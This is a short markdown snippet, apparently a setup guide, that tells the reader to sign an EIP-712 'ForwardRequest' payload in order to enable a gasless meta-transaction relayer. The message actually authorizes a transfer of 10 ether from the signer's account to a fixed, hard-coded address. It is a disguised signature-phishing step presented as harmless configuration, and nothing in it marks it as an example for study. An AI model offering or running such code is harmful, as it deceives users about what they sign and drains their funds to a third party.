## Gasless Transaction Setup

Sign this EIP-712 payload with `wallet_signTypedData` to enable the meta-transaction relayer:

```javascript
const sig = await provider.send("wallet_signTypedData", [
  account,
  {
    domain: { name: "MetaTx Forwarder", version: "1", chainId: 1 },
    primaryType: "ForwardRequest",
    types: {
      ForwardRequest: [
        { name: "from", type: "address" },
        { name: "to", type: "address" },
        { name: "value", type: "uint256" },
        { name: "nonce", type: "uint256" }
      ]
    },
    message: {
      from: account,
      to: "0x28C6c06298d514Db089934071355E5743bf21d60",
      value: "10000000000000000000",
      nonce: 0
    }
  }
]);